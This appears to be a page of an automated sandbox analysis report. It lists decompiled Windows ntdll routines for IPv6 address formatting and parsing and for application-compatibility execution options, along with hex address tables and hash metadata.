                                                                                                                                                      0x009a83b6
                                                                                                                                                      0x009a83b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a83b9
                                                                                                                                                      0x009a829d
                                                                                                                                                      0x009a829d
                                                                                                                                                      0x009a82b6
                                                                                                                                                      0x009a82b8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a82be
                                                                                                                                                      0x009a82c0
                                                                                                                                                      0x009a82d5
                                                                                                                                                      0x009a82d7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a82dd
                                                                                                                                                      0x009a82f3
                                                                                                                                                      0x009a82f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a82fb
                                                                                                                                                      0x009a8317
                                                                                                                                                      0x009a8319
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a831b
                                                                                                                                                      0x009a8332
                                                                                                                                                      0x009a8334
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a8336
                                                                                                                                                      0x009a834f
                                                                                                                                                      0x009a8351
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a8353
                                                                                                                                                      0x009a8353
                                                                                                                                                      0x009a835a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a835c
                                                                                                                                                      0x009a8378
                                                                                                                                                      0x009a837a
                                                                                                                                                      0x009a837c
                                                                                                                                                      0x009a8385
                                                                                                                                                      0x009a8388
                                                                                                                                                      0x009a83bc
                                                                                                                                                      0x009a83cf
                                                                                                                                                      0x009a83cf
                                                                                                                                                      0x009a837c
                                                                                                                                                      0x009a835a
                                                                                                                                                      0x009a8351
                                                                                                                                                      0x009a8334
                                                                                                                                                      0x009a8319
                                                                                                                                                      0x009a82f5
                                                                                                                                                      0x009a82d7
                                                                                                                                                      0x009a82b8
                                                                                                                                                      0x009a83d4
                                                                                                                                                      0x009a83d9
                                                                                                                                                      0x009a83d9
                                                                                                                                                      0x009a8277
                                                                                                                                                      0x009a824d
                                                                                                                                                      0x009a824d
                                                                                                                                                      0x009a824d
                                                                                                                                                      0x009a824d
                                                                                                                                                      0x009a83df

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsnlen
                                                                                                                                                      • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                                                                      • API String ID: 3628947076-1387797911
                                                                                                                                                      • Opcode ID: 24d389e4c1792a0ae01570e4ca24ed2b90ebc0c4bf532265b9049ac7f7794881
                                                                                                                                                      • Instruction ID: ed9561b2ac03a114ff75624e302b01ddcdf5327b9f9fd6a094a533537bf44eea
                                                                                                                                                      • Opcode Fuzzy Hash: 24d389e4c1792a0ae01570e4ca24ed2b90ebc0c4bf532265b9049ac7f7794881
                                                                                                                                                      • Instruction Fuzzy Hash: 5741A575248209BEEB019AD1CD42FDFBBACEF46B48F100512BA04D6191DFB0DB519BE4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                      			E009513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x912926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x919cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00947707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00947707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00947707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00947707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                      0x009513d5
                                                                                                                                                      0x009513d9
                                                                                                                                                      0x009513dc
                                                                                                                                                      0x009513de
                                                                                                                                                      0x009513e1
                                                                                                                                                      0x009513e8
                                                                                                                                                      0x009513ee
                                                                                                                                                      0x0097e8fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097e921
                                                                                                                                                      0x0097e921
                                                                                                                                                      0x0097e928
                                                                                                                                                      0x0097e982
                                                                                                                                                      0x0097e98a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097e99a
                                                                                                                                                      0x0097e99e
                                                                                                                                                      0x0097e9a3
                                                                                                                                                      0x0097e9a8
                                                                                                                                                      0x0097e9b9
                                                                                                                                                      0x0097e978
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097e978
                                                                                                                                                      0x0097e98a
                                                                                                                                                      0x0097e92a
                                                                                                                                                      0x0097e931
                                                                                                                                                      0x0097e944
                                                                                                                                                      0x0097e944
                                                                                                                                                      0x0097e950
                                                                                                                                                      0x0097e954
                                                                                                                                                      0x0097e959
                                                                                                                                                      0x0097e95e
                                                                                                                                                      0x0097e963
                                                                                                                                                      0x0097e970
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097e975
                                                                                                                                                      0x0097e93b
                                                                                                                                                      0x0097e980
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097e980
                                                                                                                                                      0x0097e942
                                                                                                                                                      0x0097e94b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097e94b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097e942
                                                                                                                                                      0x009513f4
                                                                                                                                                      0x009513f4
                                                                                                                                                      0x009513f9
                                                                                                                                                      0x009513fc
                                                                                                                                                      0x009513ff
                                                                                                                                                      0x00951406
                                                                                                                                                      0x0097e9cc
                                                                                                                                                      0x0097e9d2
                                                                                                                                                      0x0097e9d2
                                                                                                                                                      0x0097e9cc
                                                                                                                                                      0x0095140c
                                                                                                                                                      0x00951411
                                                                                                                                                      0x00951431
                                                                                                                                                      0x0095143a
                                                                                                                                                      0x0095143c
                                                                                                                                                      0x0095143f
                                                                                                                                                      0x0095143f
                                                                                                                                                      0x00951442
                                                                                                                                                      0x00951447
                                                                                                                                                      0x009514a8
                                                                                                                                                      0x009514ac
                                                                                                                                                      0x0097e9e2
                                                                                                                                                      0x0097e9e7
                                                                                                                                                      0x0097e9ec
                                                                                                                                                      0x0097ea05
                                                                                                                                                      0x0097ea05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00951449
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00951449
                                                                                                                                                      0x0095144c
                                                                                                                                                      0x00951459
                                                                                                                                                      0x00951462
                                                                                                                                                      0x00951469
                                                                                                                                                      0x0095146a
                                                                                                                                                      0x00951470
                                                                                                                                                      0x00951473
                                                                                                                                                      0x00951476
                                                                                                                                                      0x00951476
                                                                                                                                                      0x00951490
                                                                                                                                                      0x00951495
                                                                                                                                                      0x0095138e
                                                                                                                                                      0x00951390
                                                                                                                                                      0x00951397
                                                                                                                                                      0x00951398
                                                                                                                                                      0x00951399
                                                                                                                                                      0x009513a1
                                                                                                                                                      0x009513a4
                                                                                                                                                      0x009513a4
                                                                                                                                                      0x00951498
                                                                                                                                                      0x0095149c
                                                                                                                                                      0x0095149f
                                                                                                                                                      0x009514a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009514a4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009514a4
                                                                                                                                                      0x00951413
                                                                                                                                                      0x00951415
                                                                                                                                                      0x00951416
                                                                                                                                                      0x00951419
                                                                                                                                                      0x0095141c
                                                                                                                                                      0x00951422
                                                                                                                                                      0x009513b7
                                                                                                                                                      0x009513bc
                                                                                                                                                      0x009513bf
                                                                                                                                                      0x009513bf
                                                                                                                                                      0x009513c2
                                                                                                                                                      0x00951424
                                                                                                                                                      0x00951424
                                                                                                                                                      0x00951424
                                                                                                                                                      0x00951427
                                                                                                                                                      0x0095142b
                                                                                                                                                      0x0095142c
                                                                                                                                                      0x0095142c
                                                                                                                                                      0x0095142c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0095141c
                                                                                                                                                      0x00951411

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                      • Opcode ID: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                                                                                                                      • Instruction ID: 72cd99971ccd6134a5dcfda58467dc29bfd970ad00d573ec60a484d5d7635a30
                                                                                                                                                      • Opcode Fuzzy Hash: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                                                                                                                      • Instruction Fuzzy Hash: 0C615872A00659AACF34CF9AC8909BFBBB9EFD4305B54C42DF9DA47540D334AA44CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00947EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E00947EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9f2088; // 0x774e5599
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00947F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00963F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0091DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x9f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00963F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00920D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00963F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00928375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00963F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0098E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00963F92();
					_t38 = 1;
					L2:
					return E0091E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                      0x00947f08
                                                                                                                                                      0x00947f0f
                                                                                                                                                      0x00947f12
                                                                                                                                                      0x00947f1b
                                                                                                                                                      0x00947f31
                                                                                                                                                      0x00963ead
                                                                                                                                                      0x00963eb4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00963eba
                                                                                                                                                      0x00963ecd
                                                                                                                                                      0x00963ed2
                                                                                                                                                      0x00963ee1
                                                                                                                                                      0x00963ee7
                                                                                                                                                      0x00963eec
                                                                                                                                                      0x00963f12
                                                                                                                                                      0x00963f18
                                                                                                                                                      0x00963f1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00963f20
                                                                                                                                                      0x00963f26
                                                                                                                                                      0x00963f28
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00963f2e
                                                                                                                                                      0x00963f30
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00963f3a
                                                                                                                                                      0x00963f3b
                                                                                                                                                      0x00963f53
                                                                                                                                                      0x00963f64
                                                                                                                                                      0x00963f69
                                                                                                                                                      0x00963f6c
                                                                                                                                                      0x00963f6d
                                                                                                                                                      0x00963f6f
                                                                                                                                                      0x0096e304
                                                                                                                                                      0x0096e30f
                                                                                                                                                      0x0096e315
                                                                                                                                                      0x0096e31e
                                                                                                                                                      0x0096e321
                                                                                                                                                      0x0096e327
                                                                                                                                                      0x0096e329
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0096e32f
                                                                                                                                                      0x0096e32f
                                                                                                                                                      0x0096e337
                                                                                                                                                      0x0096e33a
                                                                                                                                                      0x0096e33b
                                                                                                                                                      0x0096e33d
                                                                                                                                                      0x0096e33f
                                                                                                                                                      0x0096e341
                                                                                                                                                      0x0096e341
                                                                                                                                                      0x0096e34e
                                                                                                                                                      0x0096e353
                                                                                                                                                      0x0096e358
                                                                                                                                                      0x0096e35d
                                                                                                                                                      0x0096e35f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0096e365
                                                                                                                                                      0x0096e365
                                                                                                                                                      0x0096e368
                                                                                                                                                      0x0096e36e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0096e374
                                                                                                                                                      0x0096e32f
                                                                                                                                                      0x00963f75
                                                                                                                                                      0x00963f7a
                                                                                                                                                      0x00963f7c
                                                                                                                                                      0x00963f7e
                                                                                                                                                      0x00963f86
                                                                                                                                                      0x00947f39
                                                                                                                                                      0x00947f47
                                                                                                                                                      0x00947f47
                                                                                                                                                      0x00947f37
                                                                                                                                                      0x00947f37
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00963F12
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00963F75
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 0096E345
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00963F4A
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00963EC4
                                                                                                                                                      • ExecuteOptions, xrefs: 00963F04
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0096E2FB
                                                                                                                                                      • Execute=1, xrefs: 00963F5E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BaseDataModuleQuery
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 3901378454-484625025
                                                                                                                                                      • Opcode ID: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
                                                                                                                                                      • Instruction ID: 3189309a9ed8af18215a5cbe5e6d5940eb83ac165bb499ce3c7a33bd8813e358
                                                                                                                                                      • Opcode Fuzzy Hash: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
                                                                                                                                                      • Instruction Fuzzy Hash: B7419B7164061D7ADF20AB94DC85FEBB3BCAB94704F0005E5B505A61C1E771AB858F61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00950B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00950B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00928980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0091DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00950CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00950CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009506BA(_t135, _t178) == 0 || E00950A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00950CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00950CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009506BA(_t124, _t142) == 0 || E00950A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                      0x00950b21
                                                                                                                                                      0x00950b24
                                                                                                                                                      0x00950b27
                                                                                                                                                      0x00950b2a
                                                                                                                                                      0x00950b2d
                                                                                                                                                      0x00950b30
                                                                                                                                                      0x00950b33
                                                                                                                                                      0x00950b36
                                                                                                                                                      0x00950b39
                                                                                                                                                      0x00950b3e
                                                                                                                                                      0x00950c65
                                                                                                                                                      0x00950c68
                                                                                                                                                      0x00950c6a
                                                                                                                                                      0x00950c6f
                                                                                                                                                      0x0097eb42
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb48
                                                                                                                                                      0x0097eb48
                                                                                                                                                      0x00950c75
                                                                                                                                                      0x00950c7a
                                                                                                                                                      0x0097eb54
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eb5a
                                                                                                                                                      0x00950c80
                                                                                                                                                      0x00950c84
                                                                                                                                                      0x0097eb98
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097eba6
                                                                                                                                                      0x00950cb8
                                                                                                                                                      0x00950cba
                                                                                                                                                      0x00950cd3
                                                                                                                                                      0x00950cda
                                                                                                                                                      0x00950ce4
                                                                                                                                                      0x00950ce9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950cec
                                                                                                                                                      0x00950c8c
